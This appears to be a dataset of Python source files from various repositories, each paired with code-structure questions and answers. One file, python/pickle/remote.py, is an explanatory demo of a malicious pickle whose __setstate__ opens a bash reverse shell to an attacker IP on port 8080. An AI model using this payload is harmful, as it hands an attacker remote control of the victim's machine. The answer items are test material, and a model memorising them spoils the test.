from posts.models import Post
from .serializers import PostSerializer, UpVoteSerializer
class PostList(generics.ListCreateAPIView):
queryset = Post.objects.all()
serializer_class = PostSerializer
class PostDetail(generics.RetrieveUpdateDestroyAPIView):
queryset = Post.objects.all()
serializer_class = PostSerializer
class UpVoteAPIView(generics.GenericAPIView):
serializer_class = UpVoteSerializer
def post(self, request, format=None):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
post_id = serializer.data['post_id']
post= Post.objects.filter(pk=post_id).first()
if post:
post.upvotes_count += 1
post.save()
return Response({
'message': 'Post has been sucessfully upvoted'
})
return Response({
"message": "Post does not exist"
})
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": false
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{... | 3 | posts/views.py | hamzabell/hackernews_mvp |
from flask import Flask, render_template, redirect
from flask_pymongo import PyMongo
import scrape_mars
# Create an instance of Flask
app = Flask(__name__)
# Use PyMongo to establish Mongo connection
app.config["MONGO_URI"] = "mongodb://localhost:27017/mars_app"
mongo = PyMongo(app)
# Route to render index.html template using data from Mongo
@app.route("/")
def home():
# Find one record of data from the mongo database
destination_data = mongo.db.collection.find_one()
# Return template and data
return render_template("index.html", mars_scraped_data=destination_data)
# Route that will trigger the scrape function
@app.route("/scrape")
def scrape():
# Run the scrape function
mars_scraped_data = scrape_mars.scrape_info()
# Update the Mongo database using update and upsert=True
mongo.db.collection.update({}, mars_scraped_data, upsert=True)
# Redirect back to home page
return redirect("/")
if __name__ == "__main__":
app.run(debug=True) | [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
... | 3 | Missions_to_Mars/app.py | Ivanpalalia/web-scraping-challenge |
# coding=utf-8
__author__ = 'JIANGH'
__all__ = [
'judge', 'event', 'find', 'excel', 'database',
'ModeType', 'Args',
'get_action', 'get_actions_def'
]
class ModeType():
"""选择器模式枚举"""
ID = 'id'
CLASS = 'class'
CSS_SELECTOR = 'css'
XPATH = 'xpath'
NAME = 'name'
INNER_TEXT = 'text'
PARTIAL_TEXT = 'partial_text'
class Args(object):
"""装饰器\n
标记函数需要哪些参数(拓展用:执行前检查参数名和数目正不正确等)\n
For example:\n
@arg({
'arg': {require type of this arg},
'mode': None #None for default (or select type)
'index': 'number' #for create a vaildator
})
"""
def __init__(self, args):
self.__args = args
def __call__(self, func):
return self.decorator(func)
def decorator(self, func):
import functools
@functools.wraps(func)
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
wrapper.args = self.__args
return wrapper
def get_action(action_name):
"""
根据action_name字符串取得对应方法,取不到时抛出异常
"""
from . import event, find, judge, excel, database
package_group = [event, find, judge, excel, database]
for action_package in package_group:
if getattr(action_package, action_name, None):
return getattr(action_package, action_name, None)
raise Exception('Could not find the action of %s' % action_name)
def get_actions_def():
"""
取得所有action的签名定义,dict形式\n
key为action_name\n
value为参数及类型\n
"""
def is_action(module, action_name):
'''判断一个名称是否是模块中的action'''
if len(action_name) < 1: return False
return action_name[0] != '_' and isinstance(getattr(module, action_name, None), types.FunctionType)
import types
from . import event, find, judge, excel, database
package_group = [event, find, judge, excel, database]
all_actions = {}
for module in package_group:
all_actions = {**all_actions, **{fn: getattr(getattr(module, fn), 'args', None) for fn in dir(module) if is_action(module, fn)}}
return all_actions
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"ans... | 3 | api/autotest/testcodegen/actions/__init__.py | P-JIANGH/autonium |
import abc
class SubCmd(abc.ABC):
@abc.abstractmethod
def add_parser(self, subparser):
return NotImplemented
@abc.abstractmethod
def execute(self, args):
return NotImplemented
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},... | 3 | management/subcmd.py | ddio/591-espresso |
def accepts(*types):
def check_accepts(f):
assert len(types) == f.__code__.co_argcount
def new_f(*args, **kwds):
for (a, t) in zip(args, types):
if not isinstance(a, t):
raise TypeError("arg %r does not match type %s" % (a, t))
return f(*args, **kwds)
new_f.__name__ = f.__name__
return new_f
return check_accepts
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"... | 3 | pyquantfinance/decorators.py | anthonyfong100/Pynance |
"""Test code for reorg"""
import logging
import numpy as np
import tvm
import topi
import topi.testing
from topi.util import get_const_tuple
def verify_reorg(batch, in_size, in_channel, stride):
'''Verify reorg operator by comparing outputs from tvm and numpy implementation'''
in_height = in_width = in_size
A = tvm.placeholder((batch, in_channel, in_height, in_width), name='A')
B = topi.cpp.vision.reorg(A, stride)
a_shape = get_const_tuple(A.shape)
dtype = A.dtype
def get_ref_data_reorg():
'''Randomly initialize the data variables and get refernce output for the reorg operation'''
a_np = np.random.uniform(size=a_shape).astype(dtype)
b_np = topi.testing.reorg_python(a_np, stride)
return a_np, b_np
a_np, b_np = get_ref_data_reorg()
def check_device(device):
'''Check the device is available and if so, build and run the program'''
if not tvm.module.enabled(device):
print("Skip because %s is not enabled" % device)
return
print("Running on target: %s" % device)
target = topi.cpp.TEST_create_target(device)
if device == "llvm":
s = topi.cpp.generic.default_schedule(target, [B], False)
else:
s = topi.cpp.cuda.schedule_injective(target, [B])
ctx = tvm.context(device, 0)
a = tvm.nd.array(a_np, ctx)
b = tvm.nd.array(np.zeros(get_const_tuple(B.shape), dtype=B.dtype), ctx)
func = tvm.build(s, [A, B], device, name="reorg")
func(a, b)
tvm.testing.assert_allclose(b.asnumpy(), b_np, rtol=1e-5)
for device in ['cuda', 'opencl', 'metal', 'rocm', 'llvm', 'vulkan']:
check_device(device)
def test_reorg():
verify_reorg(1, 38, 64, 2)
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
test_reorg()
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fe... | 3 | topi/tests/python_cpp/test_topi_reorg.py | TharinduRusira/tvm |
import pickle
import os
class foobar:
    """Demonstration of a malicious pickle payload (reverse shell).

    SECURITY: ``__setstate__`` is invoked automatically while unpickling, so
    merely calling ``pickle.loads`` on a pickle of this class executes an
    attacker-controlled shell command. Never unpickle untrusted data.
    """
    def __init__(self):
        pass
    def __getstate__(self):
        # Instance state handed to pickle; the actual payload is in __setstate__.
        return self.__dict__
    def __setstate__(self, state):
        # The attack is from 192.168.1.10
        # The attacker is listening on port 8080
        # NOTE(review): the command below uses "192.1681.10", which does not
        # match the 192.168.1.10 stated above -- likely a typo in this demo.
        os.system('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.1681.10/8080 0>&1"')
# Round-trip the object through pickle: deserialising it triggers
# __setstate__, which runs the embedded shell command.
my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | python/pickle/remote.py | zeroam/TIL |
from pluto.control.modes import mode
from pluto.control.modes.processes import process_manager
from protos import broker_pb2_grpc
class LiveControlMode(mode.ControlCommandHandler):
    """Control mode for live sessions.

    Registers a broker servicer on the supplied gRPC server so that broker
    RPCs are routed to this mode.
    """
    def __init__(self, server, framework_url, process_factory):
        # server: gRPC server instance the broker servicer is attached to.
        super(LiveControlMode, self).__init__(framework_url, process_factory)
        # NOTE(review): self._broker is presumably created by the parent
        # class constructor -- confirm in mode.ControlCommandHandler.
        broker_pb2_grpc.add_BrokerServicer_to_server(self._broker, server)
    def _create_process_manager(self):
        # Live sessions are driven by the live process manager.
        return process_manager.LiveProcessManager()
    def _accept_loop(self, loop):
        # todo: only accept LiveLoop type or subtypes
        return False
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cl... | 3 | pluto/control/modes/live_mode.py | chalant/pluto |
'''https://leetcode.com/problems/symmetric-tree/'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    """Decide whether a binary tree is symmetric around its center."""

    def isMirror(self, left, right):
        """Return True when the two subtrees are mirror reflections of each other."""
        if left is None or right is None:
            # Both missing -> mirrored; exactly one missing -> not.
            return left is right
        if left.val != right.val:
            return False
        # Outer children must mirror each other, and so must the inner ones.
        return (self.isMirror(left.left, right.right)
                and self.isMirror(left.right, right.left))

    def isSymmetric(self, root: TreeNode) -> bool:
        """A tree is symmetric when its left and right halves mirror each other."""
        if not root:
            return True
        return self.isMirror(root.left, root.right)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},... | 3 | src/101-symmetric-tree.py | sahilrider/LeetCode-Solutions |
# coding=utf-8
# Licensed Materials - Property of IBM
# Copyright IBM Corp. 2018
import unittest
from streamsx.topology.topology import *
from streamsx.topology.tester import Tester
import streamsx.spl.op as op
import streamsx.spl.toolkit
import spl_tests_utils as stu
class TestRemote(unittest.TestCase):
    """Remote-build test for an un-extracted SPL python primitive operator.

    The operator extraction and the pip requirements install are both
    performed remotely by the build service.
    """

    def setUp(self):
        Tester.setup_streaming_analytics(self, force_remote_build=True)

    def test_with_pint(self):
        schema = 'tuple<float64 temp>'
        topo = Topology()
        streamsx.spl.toolkit.add_toolkit(topo, stu._tk_dir('testtkpy_remote'))
        celsius = topo.source([0, 100, 28.5])
        readings = celsius.map(lambda t: {'temp': t}, schema=schema)
        converted = op.Map(
            "com.ibm.streamsx.topology.pytest.temps::ToFahrenheit",
            readings)
        fahrenheit = converted.stream.map(lambda x: x['temp'])
        checker = Tester(topo)
        # Expected values are whole degrees because the pint temperature
        # conversion is actually incorrect!
        checker.contents(fahrenheit, [32.0, 212.0, 83.0])
        checker.test(self.test_ctxtype, self.test_config)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true... | 3 | test/python/spl/tests/test_splpy_remote.py | Jaimie-Jin1/streamsx.topology |
from rest_framework import serializers
from rest_framework.validators import UniqueValidator
from foundation.models import Instrument, Sensor, TimeSeriesDatum
class InstrumentSerializer(serializers.Serializer):
    """Plain (non-Model) serializer for Instrument records.

    Only ``location`` is writable; ``id``, ``serial_number`` and ``name``
    are read-only and sourced from the model instance.
    """
    id = serializers.IntegerField(read_only=True)
    location = serializers.CharField(validators=[
        UniqueValidator(queryset=Instrument.objects.all())
    ])
    serial_number = serializers.UUIDField(read_only=True)
    name = serializers.CharField(read_only=True)

    def create(self, validated_data):
        """Create and return a new Instrument from the validated payload."""
        location = validated_data.get('location', None)
        instrument = Instrument.objects.create(location=location)
        return instrument

    def update(self, object, validated_data):
        """Update an existing Instrument and persist it.

        BUG FIX: this previously wrote ``validated_data.get('url')`` to
        ``object.url``, but the serializer declares no ``url`` field, so a
        submitted ``location`` was silently dropped. Write the declared
        field instead, keeping the current value when it is absent.
        """
        # NOTE: DRF convention names this parameter ``instance``; the
        # original name is kept so keyword callers are not broken.
        object.location = validated_data.get('location', object.location)
        object.save()
        return object
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/... | 3 | indoorair/instrument/serializers.py | caimingxiang/indoorair-webapp-b |
import wx
from wx.dataview import DataViewListCtrl
class WeekOverview(wx.Panel):
    """Panel presenting a week's time entries in a four-column list control."""

    def __init__(self, parent):
        super().__init__(parent)
        self.dayrow = ['Montag', '', '', '']
        self.data = ['Creadis', 'HOURS', '9.5h', 'Viel Arbeit']
        self._init_controls()
        self._init_sizers()
        self._init_events()

    def _init_controls(self):
        """Create the list control and populate its columns and demo rows."""
        self.listctrl = DataViewListCtrl(self, style=wx.dataview.DV_HORIZ_RULES)
        for heading in ('Company', 'Task', 'Hours', 'Description'):
            self.listctrl.AppendTextColumn(heading)
        for row in (self.dayrow, self.data):
            self.listctrl.AppendItem(row)

    def _init_sizers(self):
        """Make the list control fill the whole panel."""
        layout = wx.BoxSizer(wx.VERTICAL)
        layout.Add(self.listctrl, 1, wx.EXPAND)
        self.SetSizerAndFit(layout)

    def _init_events(self):
        self.Bind(wx.EVT_SIZE, self._on_resize_list, self)

    def _on_resize_list(self, event):
        """Stretch the last column so all four columns span the panel width."""
        event.Skip()
        panel_width = self.GetSize()[0]
        column_widths = [self.listctrl.GetColumn(idx).GetWidth()
                         for idx in range(4)]
        # Hand the leftover horizontal space (minus a small border) to the
        # last column.
        stretched = column_widths[3] + (panel_width - sum(column_widths)) - 4
        if stretched > 0:
            self.listctrl.GetColumn(3).SetWidth(stretched)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
... | 3 | gui/WeekOverview.py | Tabascl/TimeCapture |
import asyncio
import time
"""
"""
async def main():
    """Run five blocking 5-second jobs concurrently on executor threads."""
    def consuming(delay):
        # Blocking work -- must not run on the event-loop thread.
        time.sleep(delay)
        print("time consuming....")

    # Use the loop we are running on instead of the module-level global.
    loop = asyncio.get_running_loop()
    # Execute the blocking code on worker threads (default ThreadPoolExecutor).
    # TODO: Thread objects could also be used directly for these tasks.
    futures = [loop.run_in_executor(None, consuming, 5) for _ in range(5)]
    # BUG FIX: the original `await ft, ft1, ft2, ft3, ft4` built a tuple and
    # awaited only the FIRST future (comma binds looser than `await`).
    # gather() actually waits for all five to finish.
    await asyncio.gather(*futures)
if __name__ == '__main__':
    print(time.strftime("%X"))
    loop = asyncio.get_event_loop()
    loop.create_task(main())
    # Run the event loop until stop() is called.
    # NOTE(review): nothing ever calls loop.stop(), so this script keeps
    # running after main() completes and must be interrupted manually.
    loop.run_forever()
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | python/asyncss/07async_thread.py | edgells/dev_coms |
"""
题目:有四个数字:1、2、3、4,能组成多少个互不相同且无重复数字的三位数?各是多少?分别每行打印一个输出全部
"""
def get_number_performance(number):
    """Return every three-digit value built from digits of *number* whose
    three digits are pairwise distinct, in nested-loop order."""
    return [
        hundreds * 100 + tens * 10 + units
        for hundreds in number
        for tens in number
        for units in number
        if hundreds != tens and tens != units and units != hundreds
    ]
def print_target_number(items):
    """Print each item on its own line, then a summary line with the count."""
    for entry in items:
        print(entry)
    print('totally count is :', len(items))  # how many numbers
if __name__ == "__main__":
init_array = [1, 2, 3, 4]
print_target_number(get_number_performance(init_array))
"""
123
124
132
134
142
143
213
214
231
234
241
243
312
314
321
324
341
342
412
413
421
423
431
432
totally count is : 24
"""
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | get_right_num.py | LindaWang20160504/PythonLearning |
from Pathfinder import PathFinder
import numpy as np
import winsound
def generate_map_collage():
    """Fetch every map between start and end, normalise each to a 40x14 grid
    and render the stitched collage as an image."""
    maps_coords = pf.get_maps_coords()
    shape = (abs(end[1] - start[1]) + 1, abs(end[0] - start[0]) + 1)
    total = shape[0] * shape[1]
    collected = []
    progress = 0
    for coord in maps_coords:
        map_infos = pf.llf.coord_fetch_map(coord, pf.worldmap)
        progress += 1
        print('{}/{}'.format(progress, total))
        if map_infos is None:
            # Missing map: substitute a grid filled with 1s.
            collected.append([[1] * 14] * 40)
        elif np.array(map_infos).shape == (40, 14):
            collected.append(map_infos)
        else:
            # Malformed map: substitute a grid filled with 5s.
            collected.append([[5] * 14] * 40)
    glued = pf.glue_maps(collected, shape)
    pf.map_to_image(pf.adapt_shape_maps(glued), 1)
def generate_path():
    """Compute the path with the PathFinder, draw it onto the adapted maps,
    render the result as an image and return the map-change cells."""
    pf.get_path()
    pf.add_path_to_adapted_maps()
    pf.add_map_change_coords_to_adapted_maps()
    pf.map_to_image(pf.adapted_maps, 1)
    print(pf.path_cells)
    print(pf.get_map_change_cells())
    # NOTE(review): get_map_change_cells() is called twice (print + return);
    # presumably a pure getter -- confirm before caching the result.
    return(pf.get_map_change_cells())
# Sample waypoint coordinates; currently unused, kept for manual testing.
lel = [(4, -19), (-5, -23), (-13, -28), (-3, -42), (-17, -47), (-32, -56), (-27, -36), (-20, -20), (-16, 1), (-25, 12), (-15, 25), (-26, 35)]
start = (4, -19)
end = (-5, -23)
worldmap = 1
# The two None arguments stand in for handles not needed in this offline test.
pf = PathFinder(start, end, None, None, worldmap)
path = generate_path()
print('Done !')
# Audible notification once the (long) pathfinding run finishes; winsound is
# Windows-only.
winsound.PlaySound('../Utils/sound.wav', winsound.SND_FILENAME)
__author__ = 'Alexis'
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
... | 3 | ModelTests/test_Pathfinder.py | ProjectBlackFalcon/DatBot |
"""
Antoine Grouazel
Nov 2019
"""
import netCDF4
import numpy as np
import logging
from src.config import RASTER_NASA_COASTLINE
# Load the NASA distance-to-coast raster once at import time; the arrays are
# kept as module-level constants so lookups are fast and the file is closed
# immediately after reading.
nc = netCDF4.Dataset(RASTER_NASA_COASTLINE)
DISTANCE_COASTs = nc.variables['distance_to_coast'][:]
LON_COASTs = nc.variables['lon'][:]
LAT_COASTs = nc.variables['lat'][:]
nc.close()
def latlon2ij(lat, lon, shape2D, llbox):
    """
    Convert latitude/longitude values into (i, j) raster indices.

    Args:
        lat (float or 1D nd.array): latitudes to convert
        lon (float or 1D nd.array): longitudes to convert
        shape2D (tuple): raster shape, e.g. (10, 20)
        llbox (tuple): latmin, lonmin, latmax, lonmax bounding box

    Returns:
        tuple: integer index arrays (i, j) into the raster grid
    """
    logging.debug('input lat latlon2ij | %s', lat)
    latmin, lonmin, latmax, lonmax = llbox
    # Promote scalar inputs so the vectorised arithmetic always sees arrays.
    if isinstance(lat, (float, int)):
        lat = np.array([lat])
    if isinstance(lon, (float, int)):
        lon = np.array([lon])
    span_lon = lonmax - lonmin
    span_lat = latmax - latmin
    logging.debug('dlon = %s', span_lon)
    logging.debug('dlat = %s', span_lat)
    logging.debug('shape2D = %s', shape2D)
    logging.debug('lat type %s %s', type(lat), lat)
    logging.debug('lat range %s %s', lat.min(), lat.max())
    logging.debug('dlat %s shapz %s', span_lat, shape2D)
    logging.debug('itest %s', np.floor((lat - latmin) * shape2D[0] / span_lat))
    # floor + int cast keeps indices strictly below the raster extent
    # (changed May 2019 after a bug where indices could reach the maximum
    # value of the shape).
    row = np.floor((lat - latmin) * shape2D[0] / span_lat).astype(int)
    col = np.floor((lon - lonmin) * shape2D[1] / span_lon).astype(int)
    return row, col
def get_distance_to_coast_vecto(lons, lats):
    """
    Vectorised lookup of the distance to the nearest coast for a set of
    points, sampled from the preloaded NASA raster.

    Args:
        lons (1D nd.array): longitudes of the points
        lats (1D nd.array): latitudes of the points

    Returns:
        nd.array: distance-to-coast values at the given points
    """
    llbox = (LAT_COASTs[0], LON_COASTs[0], LAT_COASTs[-1], LON_COASTs[-1])
    indlat, indlon = latlon2ij(lats, lons, np.shape(DISTANCE_COASTs), llbox)
    # Clamp indices landing exactly on the upper edge back inside the raster.
    indlat[(indlat >= DISTANCE_COASTs.shape[0])] = DISTANCE_COASTs.shape[0] - 1
    indlon[(indlon >= DISTANCE_COASTs.shape[1])] = DISTANCE_COASTs.shape[1] - 1
    # Dead code removed: diff_lon/diff_lat were computed but never used.
    dsts = DISTANCE_COASTs[indlat, indlon]
    return dsts
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (... | 3 | src/kpi_WV_nrcs/reader_nasa_gsfc_distance_to_coast_super_light.py | tlechauveCLS/kpi_mpc |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.